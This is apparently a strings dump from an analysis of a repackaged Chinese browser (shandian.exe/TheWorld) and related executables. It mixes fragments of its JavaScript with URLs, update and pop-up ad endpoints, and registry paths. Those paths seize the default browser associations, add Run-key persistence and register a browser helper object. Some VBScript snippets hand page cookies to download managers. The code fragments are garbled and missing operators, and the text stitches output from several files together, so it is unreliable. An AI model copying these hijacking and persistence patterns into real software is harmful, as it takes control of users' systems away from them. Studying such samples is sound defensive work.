    btn.innerHTML = "";
    qp_show = external.getOptionValue(g_s_id, "twhome", "showqp"), QPshow();
    for(var i = 0; i < _strQPItem.length; i    )
    temp = _strQPItem[i].split(":^:"), SetArray(g_nCountVB   , temp[0]);
    for(var i = 0, strName, col = _tag('li', ul_item), colInput, colInputURL; i < col.length; i    ) {
    colInput[0].style.backgroundColor = '', colInput[1].style.backgroundColor = '';
    if (colInput[1].value.trim()) {
    colInputURL = colInput[1].value.trim();
    if(!validateInput(colInputURL)) {
    colInput[1].style.backgroundColor = '#f00', colInput[1].focus();
    strName = colInput[0].value.trim();
    colInput[0].style.backgroundColor = '#f00', colInput[0].focus();
    strBufSave  = colInputURL   ':^:', strBufSave  = (strName ? strName : colInputURL)   ':&:';
    list.push(colInputURL   ':^:'  (strName ? strName : colInputURL));
    else if (colInput[0].value.trim()) {
    colInputURL = colInput[0].value.trim();
    if(colInputURL == '&' || colInputURL.indexOf(':&') != -1 || colInputURL.indexOf('&:') != -1 || colInputURL.indexOf(':^') != -1 || colInputURL.indexOf('^:') != -1) {
    strBufSave  = colInputURL   ':^:'   colInputURL   ':&:';
    list.push(colInputURL   ':^:'   colInputURL);
    external.SetQuickPathValue(g_s_id, strBufSave);
    QPLocalDataMgr.saveData(list);
    if(input == '&' || input.indexOf(':&') != -1 || input.indexOf('&:') != -1 || input.indexOf(':^') != -1 || input.indexOf('^:') != -1) {
    oNewNode.style.padding = '0', oNewNode.style.margin = '0 0 -5 0';
    oNewNode.innerHTML = "
    "
    ""  
    ""  
    "
    ";
    ul_item.appendChild(oNewNode);
    if(lis.length > 12) {
    for(var i = 12; i < lis.length;)
    tItems.push(ul_item.removeChild(lis[i]));
    ul_item.style.height = ul_item.offsetHeight   'px';
    ul_item.style.overflowX = 'hidden';
    ul_item.style.overflowY = 'auto';
    ul_item.style.marginTop = '0px';
    tWarp.style.width = '530px';
    tTitUl.style.marginRight = '45px';
    tSep.style.marginRight = '40px';
    for(var i = 0; i < tItems.length; i   )
    ul_item.appendChild(tItems[i]);
    else if (lis.length == 12) {
    tWarp.style.width = '505px';
    tTitUl.style.marginRight = '20px';
    tSep.style.marginRight = '15px';
    ul_item.style.height = '', ul_item.style.overflowY = 'hidden';
    _ef.move(_ef.pane.offsetLeft, _ef.pane.offsetTop);
    _tag('textarea', lis[idx ? idx - 1 : lis.length - 1])[0].focus();
    parent = obj.parentElement.parentElement,
    if (col.length <= 6)
    _tag('img', parent)[0].src = 'user2.gif', tArea[0].innerHTML = '', tArea[1].innerHTML = '';
    parent.removeNode(true), col.length == 12 && valiItemNumber();
    function doOperations () {
    var warp = _ef.create('div', '', {'id': 'warp'}, {'border': '1 solid #3499CB','overflow' : 'hidden' , 'width': '505px', 'padding': '0'}), quick = _ef.create('div', '', {}, {'textAlign': 'left', 'padding': '0'}),
    tFrame = _ef.create('div', '', {'className': 'title_frame'}, {'margin': '0', 'padding': '10 0 2 0', 'cursor': 'move'}), ulItem = _ef.create('ul', '', {'id': 'ul_item'}, {'width': '97%', 'margin': '-5 3 5 3'}),
    qp_item = _ef.create('div', '', {'id': 'qp_item'}, {'margin': '-1 5 0 0', 'textAlign': 'left'}), opTool = _ef.create('div', '', {}, {'textAlign': 'left', 'margin': '0 0 0 7'}),
    celBn = _ef.create('button', _tpCancel, {}, {'width': '72px', 'height': '30px', 'margin': '15 0 15 18'}, function () {_ef.close();})
    tFrame.appendChild(_ef.create('div', _tpQuickPath, {'className': 'title_l'}, {'margin': '0 0 0 8'})), tFrame.appendChild(_ef.create('div', '
    ', {'className': 'title_r'}));
    tFrame.onmousedown = function () {
    x = event.clientX, y = event.clientY, isDrag = true, _ef.fade(0.62);
    bEvent.push(_ef.$dom.body.onmousemove, _ef.$dom.body.onmouseout, _ef.$dom.body.onmouseup);
    _ef.$dom.body.onmousemove = function () {
    if (isDrag && window.event.button) {
    var curPX = (_ef.pane.offsetLeft   event.clientX - x), curPY = (_ef.pane.offsetTop   event.clientY - y),
    tWidth = document.body.clientWidth - _ef.pane.offsetWidth, tHeight = document.body.clientHeight - _ef.pane.offsetHeight;
    _ef.move(curPX < 0 ? 0 : curPX > tWidth ? tWidth : curPX,
    curPY < 0 ? 0 : curPY > tHeight ? tHeight : curPY), x = event.clientX, y = event.clientY;
    else if(isDrag && !window.event.button)
    _ef.$dom.body.onmouseup = doMouseUp;
    for (var i = 0, temp, str, nCount = _strQPItem.length; i < (nCount > 6 ? nCount : 6); i    ) {
    temp = _strQPItem[i].split(":^:"), str = getDomainByUrl(temp[0]);
    var tLi = _ef.create('li', '', {}, {'padding': '0', 'margin': '0 0 -5 0'}), tDiv = _ef.create('div', '', {}, {'paddingLeft': '0px'});
    tDiv.innerHTML  = QP_InsertFavIcon(i < nCount - 1 ? temp[0] : null);
    tDiv.innerHTML  = "";
    tDiv.innerHTML  = "";
    tDiv.innerHTML  = "";
    tLi.appendChild(tDiv), ulItem.appendChild(tLi);
    _ef.open(), qp_item.appendChild(ulItem), qp_item.innerHTML  = ''   _tpAddURL   '';
    opTool.appendChild(_ef.create('button', _tpOK, {}, {'width': '72px', 'height': '30px', 'margin': '15 30 15 10'}, function () {QP_Save() && (location.reload())})),
    opTool.appendChild(celBn),
    qp_item.appendChild(opTool), quick.appendChild(tFrame), quick.appendChild(_ef.create('div', '', {'id': '_tw_quick_separator', 'className': 'separator'}, {'margin': '0 15 -10 15'}));
    quick.appendChild(_ef.create('div', ''   _tpName   '', {'id': '_tpName'}, {'styleFloat': 'left', 'width': '200px', 'textAlign': 'left', 'paddingLeft': '39px', 'fontSize': '12px', 'margin': '0'})),
    quick.appendChild(_ef.create('div', ''   _tpAddress   '', {'id': '_tpAddress'}, {'styleFloat': 'left', 'width': '280px', 'textAlign': 'left', 'paddingLeft': '37px', 'fontSize': '12px', 'margin': '0'})),
    quick.appendChild(qp_item), warp.appendChild(quick), _ef.setBody(warp);
    _ef.move((_ef.$dom.body.offsetWidth - 515) / 2, (_ef.$dom.body.clientHeight - 480) / 4), valiItemNumber(1);
    isDrag = false, _ef.fade(0.99),
    _ef.$dom.body.onmousemove = bEvent[0] || null,
    _ef.$dom.body.onmouseout = bEvent[1] || null,
    _ef.$dom.body.onmouseup = bEvent[2] || null,
    document.body.onkeypress = function doKeyPress() {
    if (event.keyCode == 13)
    return QP_Save() ? location.reload() : false;
    celBn.onblur = function () {
    clImg.offsetWidth && clImg.focus();
    external.SetOptionValue(g_s_id, n, k, v);
    String.prototype.trim = function () {return this.replace(/(^\s*)|(\s*$)/g, '');}
    str = str.replace(/&/g, '&');
    str = str.replace(/
    str = str.replace(/>/g, '>');
    str = str.replace(/'/g, '´');
    str = str.replace(/"/g, '"');
    str = str.replace(/\|/g, '¦');
    function _id (id) {return document.getElementById(id);}
    version="2.0.0.1"
    name="TheWorld.exe"/>
    name="Microsoft.Windows.Common-Controls"
    version="6.0.0.0"
    publicKeyToken="6595b64144ccf1df"
    \/:*?"<>|
    %s\%s
    %s\%s.url
    %s(%d)%s
    %d,0,0,0,700,0,0,0,%d,0,0,0,0,%s
    %d,0,0,0,0,0,0,0,%d,0,0,0,0,%s
    %sskin\%s
    by %s ver: %s
    %s: %s
    by %s, ver: %s
    %sskin\%s\preview.png
    %sskin\%s\skin.ini
    res://%s/IMG_PREVIEW
    plugin.ini
    theworld.ac
    ADDRESS_URL
    http://www.fjmjm.com/web/navierr
    Software\Microsoft\Internet Explorer\TypedUrls
    %s\%s\
    %s\*.*
    Psc.js
    bypassdomain%d
    url%d
    exdm%d
    redm%d
    boundm%d
    exd%d
    red%d
    exh%d
    reh%d
    bypass%d
    qzone.qq.com
    http://
    %*.*f
    %s%u.dat
    %sca%u.dat
    tw_form_url
    password
    form.ini
    login
    nick
    loginuser
    %s%saction=f&ver=%s&guid=%s
    %s%saction=a&ver=%s&guid=%s
    %s%saction=m&ver=%s&guid=%s
    http://stat.fjmjm.com/web/theworld2up.ini
    2.4.1.9
    SUBVER_%s
    %sTheWorld_%s_%s.zip
    TheWorld.exe
    %s%s%s
    TheWorld.ini
    %s %s
    Update.ini
    WWW_OpenURLNewWindow
    WWW_OpenURL
    %d_info
    %d_url
    dltool.ini
    TheWorld.xml
    %c:\%s\
    %s.%s
    index.htm
    %s#MetalinkFile%d
    DefaultPassword
    DefaultLogin
    StateWindowSize
    %H:%M:%S
    %Y-%m-%d %H:%M:%S
    Path%d
    1.0.0.0
    2.0.0.0
    %s%s(%d)%s
    %s KB
    %s %s, %s
    %s,%s
    MIME\Database\Content Type\%s
    .aspx
    %d:%s
    %d.%d.%d %s
    0xx
    Name:%s
    Version:%s
    FileVersion:%s
    CmdLine:%s
    Module:%s
    Module Version:%s
    Code:%s
    Offset:%s
    OS Version:%s
    IE Version:%s
    multipart/form-data; boundary=%s
    http://feedback.theworld.cn/collection/
    dbghelp.dll
    |.url|.lnk|.htm|.html|.txt|
    http://www.theworld.cn/client/sync
    favsorder.db
    %s*.*
    .ShellClassInfo
    %s\Desktop.ini
    FAV_URL
    %s (%d)
    ,tww=d
    %s_url
    .shtml
    %s://%s/favicon.ico
    %s%s_favicon.ico
    %s\url.dll
    http://about:blank
    "%s" "%%1"
    %s\%s\command
    https
    %s\%s\UserChoice
    .mhtml
    .shtm
    Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
    Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
    Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
    Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice
    TheWorld.AssocFile.MHT\Shell
    TheWorld.AssocFile.HTM\Shell
    TheWorld.HTTP\Shell
    TheWorld.AssocFile.MHT\DefaultIcon
    IE.AssocFile.MHT\DefaultIcon
    TheWorld.HTTP\DefaultIcon
    TheWorld.AssocFile.HTM\DefaultIcon
    IE.AssocFile.HTM\DefaultIcon
    IE.HTTP
    IE.AssocFile.MHT
    IE.AssocFile.HTM
    TheWorld.HTTP
    TheWorld.AssocFile.MHT
    TheWorld.AssocFile.HTM
    SOFTWARE\Classes\.mhtml
    SOFTWARE\Classes\.mht
    SOFTWARE\Classes\.shtml
    SOFTWARE\Classes\.shtm
    SOFTWARE\Classes\.html
    SOFTWARE\Classes\.htm
    ftp\shell
    https\DefaultIcon
    http\DefaultIcon
    %SystemRoot%\system32\url.dll,0
    https\shell
    http\shell
    CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
    SOFTWARE\Clients\StartMenuInternet\%s\shell\open\command
    IEXPLORE.EXE
    SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
    SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE
    SOFTWARE\Clients\StartMenuInternet\%s\
    -1,-1,-1,-1
    CLSID\%s\TreatAs
    CLSID\%s\LocalServer32
    CLSID\%s\InprocServer32
    %s\CLSID
    Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
    %s\Internet Explorer\iexplore.exe
    ftp://
    https://
    .net.cn
    .com.cn
    *www.*.*
    %s%s\
    skin.ini
    %sUpdate\%s\
    Version%d
    File%d
    Name%d
    dailytips.ini
    %slanguages\dailytips_%s
    %s?ver=%s&c=%d&guid=%s
    Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
    Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
    ?url=
    Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WEBOC_OMNAVIGATOR_IMPLEMENTATION
    HisSearchLeftPad
    system32\verclsid.exe
    CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\TreatAs
    wininet.dll
    kernel32.dll
    shell32.dll
    D27CDB6E-AE6D-11cf-96B8-444553540000
    6BF52A52-394A-11d3-B153-00C04F79FAA6
    22d6f312-b0f6-11d0-94ab-0080c74c7e95
    02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
    CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
    %s\vbscript.dll
    [^"' >]*
    [^"' >]{1}
    $ -^|:'./"()[]{}
    [^"' >]*?
    ntdll.dll
    %s%s.url
    |.url|
    TWINFO.HTM
    InsertInfoItemByHTML( %d, %d, %d, "%s", "%s" );
    SearchLeftPad
    AdressLeftPad
    %s:%s
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    http://www.fjmjm.com/cn/help-appendix-04.htm
    http://www.theworld.cn/
    http://www.fjmjm.com/cn/help.htm
    TWFORM.HTM
    StatusPluginKey
    http://www.fjmjm.com/cn/guide/guide_start.htm
    http://www.fjmjm.com/wz
    http://bbs.fjmjm.com
    %s&guid=%s&lastver=%s
    2.1.2.2
    2.1.2.4
    2.1.0.2
    2.0.5.1
    2.0.3.4
    2.3.0.7
    2.3.0.8
    2.2.1.0
    2.2.1.2
    2.2.1.4
    NAVIERR.HTM
    TheWorld.ico
    http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%s
    http://www.google.com.hk/search?q=
    baidu.com/baidu?
    baidu.com/s
    https:
    TheWorld2_AppHotKey
    (%d-%d, %d-%d)
    %%SaveObjUrl
    MediaSaver.js
    %sMouseGesture_%d.bmp
    %s%s\MouseGesture_%d.bmp
    RecentUrl
    OldUrl
    LastUrl
    TempUrl
    LockUrl
    TWHOME.HTM
    [TempUrl]
    http://%s
    twcache.ini
    %s(%u)
    %d*%d
    external.menuArguments
    General_%d
    %s%s\%s\plugin.ini
    %s%s\%s
    TWSTATUSMSG
    {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}
    CLSID\%s
    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
    TWOPTIONS.HTM
    %s\%s\%s
    %sUpdate.ini
    SetSearchKey
    twgetlasturl
    twdeletelasturl
    ImportExportFav
    GetXmlHttpObj
    \theme.ini
    %sStartPage\Components\%s
    %sStartPage\Themes\%s
    %s,%s,%s
    twcommon_%d
    http://www.theworld.cn/client/down
    http://www.theworld.cn/client/up
    http://theworld.cn/
    http://fjmjm.com/
    http://www.fjmjm.com/
    %sTheWorld\Update\
    %s.zip
    Load VBScript.dll failed
    %s|%s
    %s - %s
    http://www.
    XMLRequestMsg
    SaveClosedUrl
    AddressHistory
    AAutoKey
    SAutoKey
    BossKey
    UseBossKey
    HTTPFilter
    ShowLUrlList
    SafeExecAll
    SafeExec
    TreatFBKeyAsTabKey
    %s%s%s%s
    google.com.hk
    google.com
    zhidao.baidu.com
    http://www.google.cn/search?client=aff-cs-worldbrowser
    google.cn
    http://www.google.cn/webhp?client=
    *@*.txt
    :\e161255a-37c3-11d2-bcaa-00c04fd929db
    Software\Microsoft\Internet Explorer\TypedURLs
    %s?ver=%s&guid=%s&c=%d
    http://www.fjmjm.com/web/inst.htm
    http://www.fjmjm.com/web/uninst.htm
    Site.ini
    MFC42U.dll
    %s?url=%s&domain=%s&code=%u
    http://www.fjmjm.com/web/
    AB.GIF
    LOGO.JPG
    LOGO.GIF
    LOGO.PNG
    shdoclc.dll/
    ieframe.dll/
    =http://auto.search.msn.com
    color:#000000; background:#%s
    %page.url
    errorUrl
    ieframe.dll
    SHDOCLC.DLL
    https://www
    http://www
    0%d:^:%d:^:%d:^:%d:^:%s:^:%s
    LeftPad
    mailto:?subject=From Browser&body=%s
    https://spreadsheets.google.com/
    http://spreadsheets.google.com/
    https://docs.google.com/
    http://docs.google.com/
    00000409
    00000404
    REST %d
    200 PORT
    HTTP/1.1
    Content-Type: %s
    Content-Length: %d
    Cookie: %s
    User-Agent: %s
    Range: bytes=%s-
    546865576F726C64-86C36F73-2C25-4a7d-91EA-F5581018A42D
    http://127.0.0.1/%s
    :/\*?"<>|.
    %d.%d.%d.%d
    \StringFileInfo\xx\%s
    %s%d.%s
    mapi32.dll
    iexplore.exe
    http://www.google.cn/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=
    %s???.dll
    %u - ???
    %s.tmp
    %s.ini
    advapi32.dll
    %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s
    res://%s/%s
    rSHDOCVW.DLL
    %s   %s
    i\internet explorer\iexplore.exe
    Msxml2.XMLHTTP.2.0
    Msxml2.XMLHTTP.3.0
    Msxml2.XMLHTTP.4.0
    Msxml2.XMLHTTP.5.0
    dwmapi.dll
    uxtheme.dll
    RebarC%d
    RebarB%d
    RebarA%d
    Local\%d%s
    res://%s/
    %sskin.ini
    skin\%s
    XTabDrag:%s
    USER32.DLL
    %Documents and Settings%\%current user%\Local Settings\Temp\
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\
    %WinDir%\
    c:\program files\shandian\bin\shandian.exe
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TheWorld\Update\
    C:\PROGRA~1\shandian\bin\Site.ini
    C:\PROGRA~1\shandian\bin\theworld.ac
    tart downloading from site: http://123.sogou.com/?22014
    http://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d844309140398
    http://www.jlbnh.com
    C:\PROGRA~1\shandian\bin\twcache.ini
    %Documents and Settings%\%current user%\Favorites
    %Documents and Settings%\%current user%\Local Settings\History
    C:\PROGRA~1\shandian\bin\TheWorld.xml
    res://%Program Files%\shandian\bin\shandian.exe/NAVIERR.HTM
    http://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver=
    %Program Files%\shandian\bin\shandian.ini
    res://%Program Files%\shandian\bin\shandian.exe/IL_GESTURE
    res://%Program Files%\shandian\bin\shandian.exe/
    ARROW.GIF
    CALLAPSE.GIF
    CALLAPSE_HOVER.GIF
    CANCEL.GIF
    CLOSE.GIF
    DELETE.GIF
    EFFECT.JS
    EXPAND.GIF
    EXPAND_HOVER.GIF
    FORMTITLE.GIF
    HELP.GIF
    INCREASE.GIF
    INFO.GIF
    INFO_1.GIF
    IOAGE.CSS
    LINE.GIF
    MORE1.GIF
    MORE2.GIF
    OK.GIF
    SZTOP.GIF
    SZTOP2.GIF
    TOP1.GIF
    TOP2.GIF
    TOP3.GIF
    TWFORMDEFINE.JS
    TWOPTIONS.JS
    TWOPTIONS.VBS
    TWOPTIONSDEFINE.JS
    TWPAGE.CSS
    TWPAGE_DELETE.GIF
    TWPAGE_OLD.GIF
    TWPAGE_TOP.GIF
    TWWEBDEFINE.JS
    TWWEBUTIL.JS
    USER.GIF
    USER2.GIF
    ProgID=JetCar.Netscape
    Script=On Error Resume Next:set JetCarCatch=CreateObject("JetCar.Netscape"):if err<>0 then:MsgBox("FlashGet not properly installed!"  vbCrLf "Please install FlashGet again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
    ProgID=FG2CatchUrl.Netscape
    Script=On Error Resume Next:set JetCarCatch=CreateObject("FG2CatchUrl.Netscape"):if err<>0 then:MsgBox("FlashGet 2 not properly installed!"  vbCrLf "Please install FlashGet 2 again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
    ProgID=BHO.IFlashGetNetscape
    Script=On Error Resume Next:set JetCarCatch=CreateObject("BHO.IFlashGetNetscape"):if err<>0 then:MsgBox("FlashGet mini not properly installed!"  vbCrLf "Please install FlashGet mini again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
    ProgID=NetAnts.API
    script=On Error Resume Next:set NetAntsApi=CreateObject("NetAnts.API"):if err<>0 then:MsgBox("NetAnts not properly installed on this PC!"):else:if NetAntsApi.IsUrlExist("%d_url") then : MsgBox("%d_url" vbCrLf "already in queue"):else:call NetAntsApi.AddUrl("%d_url", "%d_info", "%page.url"):end if
    ProgID=LeechGetIE.AddURL
    script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.AddURL"):if err<>0 then:MsgBox("LeechIE.dll is not registered. Please run `regsvr32.exe LeechIE.dll'"):else:call LeechGet.AddUrl("%d_url"):end if
    ProgID=LeechGetIE.LeechIE
    script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.LeechIE"):if err<>0 then:MsgBox("download express is not installed yet"):else:call LeechGet.AddUrl("%d_url"):end if
    ProgID=dapie.catcher
    script=On Error Resume Next:set DAPExt=CreateObject("dapie.catcher"):if err<>0 then:MsgBox("DAPIE.DLL is not registered or corrupted. Please re-install Download Accelerator Plus"):else:call DAPExt.MenuUrl("%d_url", "%page.url", ""):end if
    ProgID=NTIEHelper.NTIEAddUrl
    Script=On Error Resume Next:set Obj=CreateObject("NTIEHelper.NTIEAddUrl"):if err<>0 then:MsgBox("NetTransport2 not properly installed!"  vbCrLf "Please install NetTransport2 again"):else:call Obj.AddLink("%d_url","%d_url","%d_info"):end if
    ProgID=ThunderAgent.Agent
    script=On Error Resume Next:set ThunderAgent = CreateObject("ThunderAgEnt.Agent.1"):if err<>0 then:
    MsgBox("Thunder is not installed properly!Please Install IDM again"):
    call ThunderAgent.AddTask4("%d_url", "", "", "%d_info", "%page.url", -1, 0, -1, document.cookie, "", ""):call ThunderAgent.CommitTasks2(1):set ThunderAgent = nothing:end if
    ProgID=xunleibho.CatchRightClick.1
    script=On Error Resume Next:set ThunderApi = CreateObject("xunleibho.CatchRightClick.1"):if err<>0 then:
    Info="#*01#*"   "%d_url"   "#*02#*"   document.Url   "#*03#*"   "%d_info"   "#*04#*thunder_mini#*05#*"\nr=ThunderApi.sendUrl(Info)
    Info="#*01#*"   "%d_url"   "#*02#*"   document.Url   "#*03#*"   "%d_info"   "#*04#*
    4#*05#*"\nr=ThunderApi.sendUrl(Info)
    ProgID=ThunderServer.WebThunder.1
    Script=On Error Resume Next:Set obj=CreateObject("ThunderServer.WebThunder"):If Err<>0 Then:MsgBox("Web
    not properly installed!"):Else:Call obj.CallAddTask2("%d_url", "%d_info", "%page.url", 1, "", "", ""):End If
    ProgID=NxApi.myComponent
    script=On Error Resume Next\nset WGApi=CreateObject("NxApi.myComponent")\nif err<>0 then\nelse\ncall WGApi.AddUrl("%d_url","%d_info","%page.url")\n\nend if
    ProgID=DuInvoke.Du_Invoke
    script=On Error Resume Next\nset duObject=CreateObject("DuInvoke.Du_Invoke")\nif err<>0 then \n
    MsgBox("DownUp2U not properly installed!"  vbCrLf "Please install DownUp2U again")\n
    else\n call duObject.DownloadOneLink( "%d_url", "%page.url", "%d_info" )\n end if
    ProgID=PNP.InterfaceCore.1
    if left("%d_url", 5) = "is://" then \n window.navigate("%d_url") \n
    ISLink = "is://|link_down|"   "%d_info"   "|"   "%d_url"   "|"   document.Url   "/" \n window.navigate(ISLink)\n end if
    ProgID=TuoTuHelper.RDown
    set xDownCatch=CreateObject("TuoTuHelper.RDown") :if err<>0 then:
    MsgBox("Tuotu
    else: call xDownCatch.AddText( "%d_url", "%d_info", document.Url): end if
    ProgID=QQIEHelper.QQRightClick.2
    Script=On Error Resume Next:set QQRightClick=CreateObject("QQIEHelper.QQRightClick.2"):if err<>0 then:MsgBox("QQDownload not properly installed on this PC!"):else:call QQRightClick.sendUrl2("%d_url",document.Url,"%d_info",document.cookie,0,0):end if
    ProgID=Orbitmxt.Orbit
    Script=On Error Resume Next:Set obj=CreateObject("Orbitmxt.Orbit"):If Err<>0 Then:MsgBox("Orbit not properly installed!"):Else:Call obj.download("%d_url", "%d_info", "%page.url", ""):End If
    ProgID=NXIEHelper.NXIEAddURL
    Script=On Error Resume Next:Set obj=CreateObject("NXIEHelper.NXIEAddURL"):If Err<>0 Then:MsgBox("
    not properly installed!"):Else:Call obj.AddLink("%page.url","%d_url", "%d_info" ):End If
    ProgID=DownlWithIDM.LinkProcessor
    script=On Error Resume Next:set IDMLinkProcessor=CreateObject("DownlWithIDM.LinkProcessor"):IDMLinkProcessor.Execute( external.menuArguments )
    msctls_hotkey32
    HotKey1
    %s-ansi
    %us-unicode
    :http://www.google.com.hk/search?q=%s
    :http://www.google.com
    GWeb
    (*.htm;*.html;*.mht;*.url)|*.htm;*.html;*.mht;*.url|
    (*.*)|*.*|
    !18,0,0,0,0,0,0,0,134,0,0,5,0,
    #18,0,0,0,700,0,0,0,134,0,0,5,0,
    :%d/%d/%d
    .http://www.fjmjm.com/web/welcome_cn.htm?ver=%s
    :^:1:^:http://www.baidu.com/baidu?word=%us&tn=ichuner_4_pg&ie=utf-8:^:b:^:http://www.baidu.com/s?tn=ichuner_4_pg
    1:^:Google:^:1:^:http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%us:^:g:^:http://www.google.com.hk/webhp?client=aff-worldbrowser&ie=utf-8&oe=UTF-8&hl=zh-CN
    (*.png)|*.png|JPEG
    (*.jpg;*.jpeg)|*.jpg;*.jpeg;|
    (*.bmp)|*.bmp|
    http://www.fjmjm.com/cn/skin.htm
    #http://www.fjmjm.com/cn/plugins.htm
    (*.txt;*.text;)|*.txt;*.text;|
    (*.*)|*.*|0
    !http://www.fjmjm.com/cn/index.htm
    (http://www.fjmjm.com/hl/cn/dailytips.ini$http://www.fjmjm.com/web/navierr.htm
    (*.flv*;*.mp*;*.mov*;*.rm*;*.wm?*;*.asf*;*.avi*;*.wav*;*.mid*)
    (*.swf*)
    (*.js*;*.vbs*;*.css*)
    )http://www.fjmjm.com/hl/cn/browsemode.htm
    )http://www.fjmjm.com/hl/cn/rendermode.htm
    %s ...
    : %d%%
    ...*http://www.fjmjm.com/web/web_search_cn.htm
    (*.htm;*.html;)|*.htm;*.html|
    .http://www.baidu.com/index.php?tn=ichuner_2_pg
    2, 4, 1, 9
    Lightning.exe

    shandian.exe_2548_rwx_3CF78000_00001000:

    =*2"=*2"=

    shandian.exe_2548_rwx_3D930000_00001000:

    .text
    `.data
    .rsrc
    @.reloc

    sdad.exe_304:

    .text
    `.rdata
    @.data
    .rsrc
    @.reloc
    Software\Microsoft\Windows\CurrentVersion\Run
    PopWinParam.xml
    setup.ini
    1.0.0
    20131020010000
    /web/PopWinParam.asp?d=2014419&mainver=%s&popver=%s&xmlver=%s
    %d.%d.%d
    %d:%d
    HKEY_CLASSES_ROOT
    HKEY_CURRENT_USER
    HKEY_LOCAL_MACHINE
    HKEY_USERS
    HKEY_PERFORMANCE_DATA
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    &#xX;
    %s="%s"
    %s='%s'
    version="%s"
    encoding="%s"
    standalone="%s"
    isShow
    kernel32.dll
    Please contact the application's support team for more information.
    - Attempt to initialize the CRT more than once.
    - CRT not initialized
    - floating point support not loaded
    portuguese-brazilian
    operator
    GetProcessWindowStation
    USER32.DLL
    KERNEL32.dll
    USER32.dll
    GDI32.dll
    RegCloseKey
    RegCreateKeyA
    RegDeleteKeyA
    RegCreateKeyExA
    RegOpenKeyExA
    RegEnumKeyExA
    RegQueryInfoKeyA
    ADVAPI32.dll
    ole32.dll
    OLEAUT32.dll
    SHLWAPI.dll
    COMCTL32.dll
    HttpQueryInfoA
    InternetOpenUrlA
    WININET.dll
    imagehlp.dll
    VERSION.dll
    GetProcessHeap
    GetCPInfo
    GetConsoleOutputCP
    .?AUDWebBrowserEvents2@@
    http://stat.fjmjm.com
    http://www.fjmjm.com
    %Program Files%\shandian\bin\sdad.exe
    nshell.Explorer.2
    ekernel32.dll
    KERNEL32.DLL
    mscoree.dll
    Replace%Select the entire document
    Arrange Icons/Arrange windows so they overlap
    Cascade Windows5Arrange windows as non-overlapping tiles
    Tile Windows5Arrange windows as non-overlapping tiles
    Tile Windows(Split the active window into panes
    1, 0, 0, 1
    mini.exe

    F30241_s_0523.exe_544:

    .text
    `.rdata
    @.data
    .ndata
    .rsrc
    @.reloc
    RegDeleteKeyExW
    Kernel32.DLL
    PSAPI.DLL
    %s=%s
    GetWindowsDirectoryW
    KERNEL32.dll
    ExitWindowsEx
    GetAsyncKeyState
    USER32.dll
    GDI32.dll
    SHFileOperationW
    ShellExecuteW
    SHELL32.dll
    RegDeleteKeyW
    RegCloseKey
    RegEnumKeyW
    RegOpenKeyExW
    RegCreateKeyExW
    ADVAPI32.dll
    COMCTL32.dll
    ole32.dll
    VERSION.dll
    Nullsoft Install System v2.46.5-Unicode
    logging set to %d
    settings logging to %d
    created uninstaller: %d, "%s"
    WriteReg: error creating key "%s\%s"
    WriteReg: error writing into "%s\%s" "%s"
    WriteRegBin: "%s\%s" "%s"="%s"
    WriteRegDWORD: "%s\%s" "%s"="0xx"
    WriteRegExpandStr: "%s\%s" "%s"="%s"
    WriteRegStr: "%s\%s" "%s"="%s"
    DeleteRegKey: "%s\%s"
    DeleteRegValue: "%s\%s" "%s"
    WriteINIStr: wrote [%s] %s=%s in %s
    CopyFiles "%s"->"%s"
    CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
    Error registering DLL: Could not load %s
    Error registering DLL: %s not found in %s
    GetTTFFontName(%s) returned %s
    GetTTFVersionString(%s) returned %s
    Exec: failed createprocess ("%s")
    Exec: success ("%s")
    Exec: command="%s"
    ExecShell: success ("%s": file:"%s" params:"%s")
    ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
    Exch: stack < %d elements
    RMDir: "%s"
    MessageBox: %d,"%s"
    Delete: "%s"
    File: wrote %d to "%s"
    File: skipped: "%s" (overwriteflag=%d)
    File: error creating "%s"
    File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
    Rename failed: %s
    Rename on reboot: %s
    Rename: %s
    IfFileExists: file "%s" does not exist, jumping %d
    IfFileExists: file "%s" exists, jumping %d
    CreateDirectory: "%s" created
    CreateDirectory: can't create "%s" - a file already exists
